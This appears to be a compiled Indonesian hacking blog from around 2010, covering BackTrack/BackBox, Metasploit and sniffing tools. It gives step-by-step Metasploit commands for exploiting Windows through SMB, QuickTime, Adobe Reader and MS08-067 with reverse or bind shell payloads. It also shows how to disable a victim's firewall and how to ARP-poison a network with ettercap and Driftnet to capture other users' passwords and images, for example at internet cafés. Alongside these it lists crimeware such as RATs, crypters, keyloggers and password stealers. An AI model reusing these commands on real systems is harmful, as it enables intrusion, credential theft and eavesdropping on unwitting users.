Banyak Orang bicara banyak tentang Linux berargumen bahwa linux tidak ada virus(termasuk saya,^^),kemarin saya mencari tentang hal itu kemudian menemukan fakta bahwa linux memiliki kelemahan.mungkin jarang bagi kita mendengar exploit pada linux karena yang kita lihat adalah bahwa jika ingin melakukan sesuatu sistem linux pasti meminta password,Vulnerability ini berlaku pada kernel :

Ubuntu Ubuntu Linux 9.10 sparc
Ubuntu Ubuntu Linux 9.10 powerpc
Ubuntu Ubuntu Linux 9.10 lpia
Ubuntu Ubuntu Linux 9.10 i386
Ubuntu Ubuntu Linux 9.10 amd64
Ubuntu Ubuntu Linux 9.04 sparc
Ubuntu Ubuntu Linux 9.04 powerpc
Ubuntu Ubuntu Linux 9.04 lpia
Ubuntu Ubuntu Linux 9.04 i386
Ubuntu Ubuntu Linux 9.04 amd64
Ubuntu Ubuntu Linux 8.04 LTS sparc
Ubuntu Ubuntu Linux 8.04 LTS powerpc
Ubuntu Ubuntu Linux 8.04 LTS lpia
Ubuntu Ubuntu Linux 8.04 LTS i386
Ubuntu Ubuntu Linux 8.04 LTS amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Ubuntu Ubuntu Linux 10.10 powerpc
Ubuntu Ubuntu Linux 10.10 i386
Ubuntu Ubuntu Linux 10.10 amd64
Ubuntu Ubuntu Linux 10.04 sparc
Ubuntu Ubuntu Linux 10.04 powerpc
Ubuntu Ubuntu Linux 10.04 i386
Ubuntu Ubuntu Linux 10.04 amd64
Linux kernel 2.6.35
Linux kernel 2.6.35
Linux kernel 2.6.34
Linux kernel 2.6.34
Linux kernel 2.6.33 .1
Linux kernel 2.6.33
Linux kernel 2.6.32 .9
Linux kernel 2.6.32
Linux kernel 2.6.31 5
Linux kernel 2.6.31 13
Linux kernel 2.6.31 .2
Linux kernel 2.6.31 .11
Linux kernel 2.6.31 -rc7
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc6
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31 -rc3
Linux kernel 2.6.31 -rc1
Linux kernel 2.6.31
Linux kernel 2.6.30 .10
Linux kernel 2.6.30 .1
Linux kernel 2.6.30
Linux kernel 2.6.36-rc8
Linux kernel 2.6.36-rc6
Linux kernel 2.6.36-rc5
Linux kernel 2.6.36-rc4
Linux kernel 2.6.36-rc1
Linux kernel 2.6.35.5
Linux kernel 2.6.35.4
Linux kernel 2.6.35.1
Linux kernel 2.6.35.1
Linux kernel 2.6.35-rc6
Linux kernel 2.6.35-rc5-git5
Linux kernel 2.6.35-rc5
Linux kernel 2.6.35-rc4
Linux kernel 2.6.35-rc1
Linux kernel 2.6.34.3
Linux kernel 2.6.34.2
Linux kernel 2.6.34.1
Linux kernel 2.6.34-rc6
Linux kernel 2.6.34-rc5
Linux kernel 2.6.34-rc4
Linux kernel 2.6.34-rc2-git1
Linux kernel 2.6.34-rc2
Linux kernel 2.6.34-rc1
Linux kernel 2.6.33.7
Linux kernel 2.6.33-rc8
Linux kernel 2.6.33-rc7
Linux kernel 2.6.33-rc7
Linux kernel 2.6.33-rc6-git5
Linux kernel 2.6.33-rc6
Linux kernel 2.6.33-rc5
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.33-rc4
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.33-rc1
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.32.8
Linux kernel 2.6.32.7
Linux kernel 2.6.32.6
Linux kernel 2.6.32.5
Linux kernel 2.6.32.4
Linux kernel 2.6.32.3
Linux kernel 2.6.32.22
Linux kernel 2.6.32.2
Linux kernel 2.6.32.18
Linux kernel 2.6.32.17
Linux kernel 2.6.32.16
Linux kernel 2.6.32.15
Linux kernel 2.6.32.14
Linux kernel 2.6.32.13
Linux kernel 2.6.32.12
Linux kernel 2.6.32.11
Linux kernel 2.6.32.10
Linux kernel 2.6.32.1
Linux kernel 2.6.32-rc8
Linux kernel 2.6.32-rc7
Linux kernel 2.6.32-rc5
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.32-rc4
Linux kernel 2.6.32-rc3
Linux kernel 2.6.32-rc2
Linux kernel 2.6.32-rc1
Linux kernel 2.6.31.6
Linux kernel 2.6.31.4
Linux kernel 2.6.31.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.31-rc9
Linux kernel 2.6.31-rc8
Linux kernel 2.6.31-rc5-git3
Linux kernel 2.6.31-rc4
Linux kernel 2.6.31-rc2
Linux kernel 2.6.31-git11
+ Trustix Secure Enterprise Linux 2.0
+ Trustix Secure Linux 2.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Linux kernel 2.6.30.5
Linux kernel 2.6.30.4
Linux kernel 2.6.30.3

untung aja ane udah kernel 2.6.32-26-generic,sekarang kita liat download source codenya disini.

commands :
gcc 15*.c -o exploit
./exploit

Menambahkan Repository Backbox Linux 1 RC2



Langkah 1: Buka terminal dan ketik:

sudo add-apt-repository ppa:backbox/one

Sistem anda sekarang akan mengambil kunci PPA. Hal ini memungkinkan BackBox Linux untuk memverifikasi paket di AKP.

Langkah 2: Sekarang,Anda harus memberitahu sistem anda untuk menarik ke bawah daftar terbaru dari perangkat lunak dari setiap arsip itu tahu tentang, termasuk AKP Anda hanya ditambahkan ketikan :

sudo apt-get update

Sekarang Anda siap untuk mulai menginstal perangkat lunak dari AKP!

AKP ini juga dapat ditambahkan ke sistem anda secara manual dengan menyalin baris di bawah ini dan menambahkan mereka ke sumber perangkat lunak sistem anda.

deb http://ppa.launchpad.net/backbox/one/ubuntu lucid main
deb-src http://ppa.launchpad.net/backbox/one/ubuntu lucid main

install Backbox Linux 1 RC2



1. Masukkan CD BackBox ke dalam CD ROM anda.
2. kemudian restart.
3. Klik "Install Linux BackBox".
4. Pilih bahasa yang digunakan dan klik "Forward"
5. Pilih lokasi Anda dan klik "Forward".
6. Pilih di mana Anda ingin menempatkan BackBox dan klik "Forward".
7. Masukkan informasi yang diminta, dan klik "Forward".
8. Pastikan bahwa bahasa, tata letak, lokasi, dan informasi pribadi sudah benar dan klik "Install". Wizard instalasi dimulai.
9. Ketika selesai wizard instalasi, Muncul kotak dialog "Installation complete".
10. Klik "Restart now" untuk me-restart komputer Anda.Bravo BackBox sekarang sudah terinstal!

Daftar tools BackBox Linux 1 RC2


 
 Daftar tools yang terdapat pada BackBox Linux 1 RC2

    @ Maintaining Access
          @ weevely
    @ Miscellaneous
          @ chntpw
          @ macchanger-gtk
          @ netwox
          @ ngrep
          @ tcpdump
    @ Network Napping
          @ hping3
          @ nbtscan
          @ netdiscover
          @ p0f
          @ xprobe
          @ zenmap
    @ Privilege Escalation
          @ Password Cracking
                @ john
                @ medusa
          @ Sniffing
                @ drifnet
                @ dsniff
                @ ettercap-gtk
                @ tshark
                @ wireshark
          @ Spoofing
                @ python-scapy
                @ yersinia
    @ Vulnerability Assessment
          @ Exploitation
                @ msf
          @ Vulnerability Scanners
                @ openvas
    @ Web Application Analysis
          @ CMS Scanners
                @ cms-explorer
                @ plecost
                @ whatweb
          @ Database Assessment
                @ sqlibf
                @ sqlmap
                @ pynject
          @ Proxies
                @ paros
          @ Scanners
                @ nikto
                @ skipfish
                @ w3af
    @ Wireless Analysis
          @ Cracking
                @ aircrack-ng
          @ Scanning
                @ kismet
    @ Other
          @ polipo
          @ tor
          @ tsclient
          @ wipe

BackBox Linux


FLEXIBLE PENETRATION TESTING DISTRIBUTION

BackBox adalah distribusi Linux berbasis Ubuntu LTS Lucid 10,04 dikembangkan untuk melakukan penetration tests dan security assessments. Dirancang untuk menjadi cepat, mudah digunakan dan untuk menyediakan berkat lingkungan minimal belum lengkap desktop untuk repositori sendiri software selalu diperbarui ke versi stabil terakhir dari alat yang paling dikenal dan digunakan untuk hacking.

Download  disini..

Exploit Windows 7,Vista dan Server 2008

What is this ?

Dengan memanfaatkan kelemahan SRV2.SYS SMB pada Microsoft kita dapat meakukan exploit,exploit ini hanya berlaku untuk Windows 7(bukan RTM),Windows Vista SP1,dan Windows 2008 Server(sebelum R2) yang memiliki SRV2.SYS.

Guide :

> Gunakan Metasploit untuk beraksi.

What do i need ?

> Metasploit --- on Backtrack 4 R2

Commands :
msfconsole 
use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh
set RHOST IP_TARGET
run
Referensi :


http://www.metasploit.com/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh

Kelebihan Backtrack 4 R2


Setelah resmi dirilis Backtrack 4 R2 hadir dengan beberapa fitur menarik, berikut fitur-fitur baru dan perbaikan yang terjadi pada Backtrack 4 r2

1. Kernel 2.6.35.8 - banyak perbaikan terutama pada mac80211 stack.
2. Telah Mendukung USB 3.0.
3. Lebih mantap dengan menambah dukungan dengan Wireless Cards.
4. Sudah menerapkan patch pada semua wireless Injection,serta dukungan yang besar untuk serangan Wireless.
5. Pada desktop environment prosesnya lebih cepat dari sebelumnya.
6. Revamped lingkungan Fluxbox untuk KDE yang ditantang.
7. Metasploit yang ada dibangun kembali dari awal, MySQL db_drivers bekerja di luar kotak.
8. Sudah memperbaharui paket lama, menambahkan yang baru, dan menghapus yang usang.
9. Dokumentasi dan dukungan yang lebih baik  dengan BackTrack Wiki.
10. Sudah pasti paling profesional,rilis efisien yang pernah diuji.

Daftar Aplikasi Hacking.

Kemaren saya sempat berkunjung kepada blog sahabat, dia memiliki artikel untuk List Aplikasi Hacking, oleh karena saya tertarik untuk membuat artikel seperti itu, maka saya mencari-cari dan mengumpulkan list aplikasi yang beberapa sering saya gunakan, Berikut adalah listnya.

Batch 
- DELmE's Batch Virus Generator v 2.0
- Power Of Batch [Text File]

Binders 
- Bl0b B!nder 0.2.0 + USG
- BlackHole Binder
- F.B.I. Binder
- Predator 1.6
- PureBiND3R by d3will
- Schniedelwutz Binder 1.0
- Simple Binder by Stonedinfect
- sp1r1tus Binder 1.0
- Tool-Store Binder 1.0
- Tool-Store Toasty Binder 1.0
- Yet Another Binder 2.0
- Others

Crypters 
- Bifrost Crypter by ArexX 2
- Cryptable Seduction 1.0 by DizzY
- Crypter by Permabatt
- Crypter bY YoDa
- Cryptic 1.5
- Daemon Crypt 2 Public
- Deception 4 by [RaGe] [Favorite :D]
- Destructor Crypter
- EXECrypt 1 M0d by CARDX
- Fuzz Buzz 1.2 by BulletProof
- OSC-Crypter by haZl0oh M0d
- Poison Ivy Crypt M0d by CARDX
- SaW V1 Mod by LEGIONPR
- Skorpien007 Crypter 3.1
- Stonedinfect Crypter 1.0
- Trojka Crypter 1.1 by tr1p0d

Keyloggers
- Ardamax 2.8
- Ardamax 2.41

Nukers dan Fl00ders
- Ass4ult
- B4ttl3 P0ng
- Click v2.2
- Fortune
- ICMP Fl00d
- Panther Mode 1 & 2
- Rocket v1.0
- RPC Nuke

Port & IP Scanners 
- Advanced IP Scanner
- Advanced Port Scanner
- Bitching Threads
- BluePortScan
- LanSpy
- NeoTracePro
- NetScanTools
- ProPort
- Putty v0.6
- SuperScan
- Trojan Hunter 15
- ZenMap - Nmap v5.21 [Win]

R.A.T.s 
- Apocalypse 1.4.4
- Aryan v0.5
- Bandook RAT 1.35
- Bifrost 1.2.1d
- Cerberus 1.03.4
- All Cybergates from v1.01.8 to v1.04.8
- DarkComet 2 RC3
- Lost Door 4.0 Pro
- MeTuS-Delphi-2.8
- Nuclear RAT 2.1.0
- Optix v1.33
- Poison Ivy 2.3.2
- ProRat 1.9 SE
- SharK 3
- Spy-Net v2.6
- SubSeven 2.3
- Turkojan 4 Gold

Sniffers 
- Cain & Abel Self Installer [WinXP]
- WireShark Self-Installer [Win32]

Stealers 
- 1337 SteamACC Stealer Private
- Allround Stealer
- Armageddon Stealer 1.0 by Krusty
- bl0b Recovery 1.0
- Blade Stealer 1.0 PUBLIC
- Codesoft PW Stealer 0.35
- Codesoft PW Stealer 0.50
- Dark Screen Stealer 2
- Dimension Stealer 2 by Gumball
- FileZilla Stealer 1.0 PUBLIC
- FileZilla Stealer by Stonedinfect
- Firefox Password Stealer - Steamcafe
- Fly Stealer 0.1
- Fudsonly Stealer 0.1
- Hackbase Steam Phisher 1.2 BETA
- spam 0.0.1.4
- spam Stealer
- HardCore Soft 0.0.0.1
- ICQ Steal0r
- IStealer 4.0
- IStealer 6.0 Legends
- LabStealer by Xash
- Multi Password Stealer 1.6
- Papst Steale.NET
- Pass Stealer 3.0
- Pesca Stealer 0.2
- pixel Stealer 1.3.0 SC
- pixel Stealer 1.4.0
- ProStealer
- Public Firefox 3 Stealer
- Pure-Steam 1.0 CS
- Pw Stealer by Killer110
- PWStealer 2.0
- Remote Penetration 2.2
- SC LiteStealer 1
- SimpleStealer 2.1
- SPS Stealer
- SStealer by till7
- Steam Stealer 1.0 by ghstoy
- Steam Stealer by till7
- Stupid Stealer 6 mit PHP Logger
- System Stealer 2
- The Simpsons Stealer 0.2
- Tool-Store FileZilla Stealer 1.0
- Ultimate Stealer 1.0
- Universal1337 - The Account Stealer
- Universal1337 2
- Universal1337 3

Vulnerability Scanner and Exploiter 
- Atk ToolKit 4.1 [Src Code Included]
- Metasploit Framework V3.4.0 [Win]
- Nessus [Win32]

Website Exploit And SLQ Injections
- Admin Finder
- CGI-Bug Scanner
- Exploit Scanner
- ServerAttack
- SQL Helper
- Dork List [Text File]
- Dork [Text File]
- Master Google Hack List [Text File]

Others
- Bruteforcers
- Extra! [From VIP Vince Tool pack]
- ProxyBrowser
- Various Tools

Backtrack 4 R2 telah dirilis


Pada bulan november 2010 telah dirilis Backtrack 4 R2,ini adalah versi terakhir dan terbaik yang keluar dengan respon lebih besar dari desktop, dukungan hardware yang lebih baik, dukungan kartu wireless yang lebih luas,serta lingkungan kerja yang efisien.

Kelebihan Backtrack 4 R2 dari versi sebelumnya adalah :

   @ Kernel 2.6.35.8 - * * Banyak perbaikan mac80211 stack.
   @ Mendukung USB 3.0.
   @ Menambah dukungan dengan Wireless Cards.
   @ Menerapkan patch pada semua wireless Injection,serta dukungan yang besar untuk serangan Wireless.
   @ desktop environment lebih cepat dari sebelumnya.
   @ Revamped lingkungan Fluxbox untuk KDE yang ditantang.
   @ Metasploit dibangun kembali dari awal, MySQL db_drivers bekerja di luar kotak.
   @ Memperbaharui paket lama, menambahkan yang baru, dan menghapus yang usang.
   @ BackTrack Wiki dengan dokumentasi yang lebih baik dan dukungan.
   @ Paling profesional,rilis efisien yang pernah diuji.

Bagi kalian yang ingin meng-upgrade versi lama BT4 disini.

Referensi:
Download Backtrack : http://www.backtrack-linux.org/backtrack/backtrack-4-r2-download/
Download Backtrack : http://www.backtrack-linux.org/downloads/

MetaSploit

Metasploit adalah salah satu software untuk melakukan penetrasi sistem yang banyak digunakan oleh kalangan Security dan IT Professional diseluruh dunia termasuk Indonesia. Kemampuannya untuk melakukan exploitasi, Pemeriksaan Password, web bug scanning, dan social engineering. Dapat digunankan dengan mode GUI atau juga mode text melalui terminal.

Metasploit dirilis dengan beberapa 3 tipe :
1. Metasploit Free Edition
2. Metasploit Express
3. Metasploit Pro

Buat Pengguna Backtrack kita bisa bersyukur oleh karena tools ini sudah dipaketkan didalam daftar tools Backtrack. Dan untuk selain Pengguna Backtrack bisa melakukan Instalasi secara Manual, sahabat bisa mencari di Tutorial Install Metasploit diLinux.

Exploit pada Vulnerability QuickTime 7.6.7

What is this ?

Kembali lagi dengan celah yang baru yaitu QuickTime 7.6.7,dengan kelemahan pada QuickTime 7.6.7 ini,kita dapat melakukan Exploit,3;).




Guide :

> Gunakan Metasploit untuk beraksi kembali.

What do i need ?

> Metasploit --- on Backtrack 4 (Final)

Commands :

use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST IP_KITA
set SRVPORT 80
set URIPATH /
set payload windows/shell/reverse_tcp
set LHOST IP_KITA
set LPORT 5050
exploit

Exploit pada Vulnerability Adobe Reader 9.3.4

What is this ?

Ini adalah salah satu cara untuk Exploit Windows (Termasuk windows 7),melalui celah pada Adobe Reader 9.3.4,jadi yang mengunakan Adobe Reader 9.3.4 harap lebih hati-hati y,3:).



Guide :

> Gunakan Metasploit untuk beraksi.

What do i need ?

> Metasploit --- on Backtrack 4 (Final)

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler

Sniffing dengan Metasploit


Kita dapat melakukan aktivias sniffing dengan menggunakan Metasploit dengan cara melakukan exploitasi windows terlebih dahulu dan nantinya hasil dari Sniffing akan dibaca oleh Wireshark untuk menterjemahkan hasil dari capture data pada jaringan. Selain sniffing dengan metasploit kita juga bisa menjalankan keylogger pada komputer target, bisa dilihat pada artikel Membuat Backdoor dengan x86/shikata_ga_nai.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST IP_Target
exploit
use sniffer
sniffer_interfaces
sniffer_start 1 200000
sniffer_stats 1
sniffer_dump 1 /Tempat_Menyimpan_Log.cap
sniffer_stop 1

Mendisable firewall dengan metasploit


Jika sahabat melakukan exploitasi kepada sebuah sistem operasi windows, dan menemukan ternyata Firewall pada komputer target masih dalam status Enable, maka kita perlu melakukan serangan yang berbeda guna mendisable Firewall untuk mempermudah aktivitas kita.

use multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost IP_KITA
set lport 8080
exploit
shell
netsh firewall set opmode disable

Lanmap

Pagi ini saya sedang mencari sebuah tools untuk memindai jaringan visual dari Lan lokal. Untuk tugas ini saya menggunakan alat yang berguna salah satunya adalah Lanmap. Lanmap adalah command-line tool hanya tersedia untuk Ubuntu yang akan memonitor jaringan dan menyusun gambar 2D dari jaringan. Gambar yang dihasilkan oleh lanmap ini akan menyertakan informasi tentang mesin anda serta paket yang dikirim dan alamat MAC. Alat ini sangat berguna untuk jaringan yang sangat besar.

Tapi ketika saya mencari tau tentang lanmap,saya mendapati bahwa Develovernya baru saja membuat Lanmap-2 yang jauh lebih kuat. Sayangnya Lanmap-2 tidak selengkap Lanmap-1 sehingga harus digunakan hingga jaringan terpindai semuanya. Tetapi yang menjadi keuntung adalah Lanmap masih dalam repositori Ubuntu sehingga untuk proses instalasi sangat mudah.


Seperti yang dinyatakan sebelumnya, Lanmap hanya tersedia untuk Ubuntu (dan Debian-based) sistem. Kemungkinan besar, jika Anda menggunakan apt-get, Anda dapat menginstal Lanmap. Tentu saja Anda tidak harus menginstal melalui baris perintah, tetapi jika Anda ingin hanya mengeluarkan perintah:

sudo apt-get install lanmap

Perintah ini akan meminta Anda untuk Y atau N untuk menginstal persyaratan. Klik "y" (tanpa tanda kutip) dan tekan enter. Lanmap akan terinstall dengan cepat dan kita telah siap untuk sebuah pemindai jaringan.

lanmap-i eth0 -r 30 -T png -o /home/octopurba/Pictures/

http://www.parseerror.com
http://www.ghacks.net

Driftnet

Driftnet adalah program sniffing lalu lintas jaringan dan mengambil keluar gambar dari TCP aliran itu mengamati. Dan sangat menyenangkan untuk dijalankan pada host yang banyak lalu lintas webnya,contohnya warnet,3-)

Driftnet dapat mengambil dari MPEG audio stream dari lalu lintas jaringan dan mencoba untuk memainkannya. Anda juga dapat sekarang menggunakan driftnet dengan webcollage milik Jamie Zawinski, sehingga dapat berjalan sebagai screen saver.

1. Untuk memulai aktivitas sniffing.

driftnet -h
driftnet -i eth0

2. Kirimkan paket ARP untuk mendapatkan lebih banyak data pada jaringan.

ettercap -T -Q -M arp -i eth0 // //

3. Untuk mengambil data gambar cukup klik pada gambar yang ingin disimpan.

Sniffing dengan ettercap

Ettercap adalah sebuah program sniffer yang bagus untuk kegiatan seniffing,karena ia menangkap data pada jaringan lokal.Ettercap dikenal mampu menangkap semua lalu lintas jaringan dan kita dapat menangkap password dimasukkan oleh pengguna lain dari jaringan kami. Menganalisis data yang kami tangkap percakapan pesan klien seperti MSN atau lain klien instant messaging, kita bisa menggunakan dengan Man-in-the-Midler "MITM (Man The Midle), dan sebagainya.

Langkah pertama dan menginstal sniffer (ettercap).
Dan versi terbaru 0.7.3 dan telah tersedia untuk Linux dan Windows OS.

Versi Windows
Versi Linux

Untuk distro berbasis debian / ubuntu cukup mengetikan :

# sudo apt-get install ettercap-gtk

Untuk distro lain, kita harus mendownload mengkompilasi paket.


#. / Configure
# make
# make install


How to ?


Pertama buka Ettercap dan jalankan dalam mode root.




Sniffer > Unified Sniffing

Pilih kartu jaringan yang ingin anda pilihk kemudian klik "OK".

Hosts > Scan for Hosts
Di bagian bawah layar sebagai "Hosts List adalah host yang ditambahkan" (Mereka yang tercantum di bawah ini adalah komputer yang sedang online dalam jaringan).





Hosts > Host list

Sekarang mucul IP dari pada komputer yang terhubung,harus diingat bahwa router juga ikut muncul.

Pilih IP komputer Anda untuk menyerang dan klik "Add to Target 1", maka router pada "Add to Target 2"




Sebelum Anda mulai melakukan sniffer,mari kita ingat dan gunakan teknik yang disebut man-in-the-Midler.

MITM > ARP Poisoning - Sekarang check list pada "Sniff remote connections" dan klik "OK"



Start > Start sniffing.


kita telah melakukan sniffing.

View > Connections - Di sini kita dapat melihat semua koneksi,klik double untuk dapat melihat data yang dikandungnya, termasuk percakapan, pengguna dan password, dll.

Sekarang tinggalkan biarkan Ettercap bekerja.3;)

 
biz.